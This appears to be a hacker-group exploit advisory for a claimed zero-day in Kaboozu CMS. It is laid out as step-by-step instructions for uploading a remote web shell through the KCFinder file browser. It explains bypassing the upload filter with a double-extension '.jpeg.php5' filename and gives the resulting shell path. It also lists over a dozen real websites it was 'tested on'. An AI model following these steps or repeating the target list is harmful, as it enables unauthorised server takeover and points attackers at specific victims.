.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / => 1 Kas?mda oylar MHP'ye, ona gre.. <= \/ \/ \/ Kaboozu CMS x.x.x - Remote Shell Upload Vulnerability (0day) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://milw00rm.com [~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, Septemb0x, KedAns-Dz, Turksec( TurkGuvenligi ) ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Kaboozu CMS |~Affected Version : 6.0.0 and all version |~Official : http://www.kaboozu.dk/ |~RISK : High |~DORK : N/A |~Tested On : [L] Kali Linux [R] ######################################################## Tested on; www.klimadan.dk www.mormorshjem.dk www.promidt.dk www.oh-industri.dk www.ungherning.dk www.isenvad-badminton-klub.dk www.stensbjerg-totalbyg.dk www.baboonwire.com www.www.ankerhost.dk www.birk-ikast.dk www.deviso.dk www.dovista.com www.oen.dk www.mea-cor.dk ---------------------------------------------------------- INFO ------------------------------------------------------- Step1: Go to Target: [URL]/kaboozu/tools/kcfinder/browse.php?type=media Step2: Go to the "Banner" directory (You can install malicious code. CoDer jerks are just "php" They put filters, Something happens that they forget PHP5 supports most Linux servers the name of the shell file if you do it this way this would be easily upload ".php5" ) Step3 : sample file name for bypass "h4x0re.jpeg.php5" and it upload ! Step4 : the uploaded file on the server will be here [URL]/custom/media/Banner/h4x0re.jpg.php5 ----------------------------------------------------------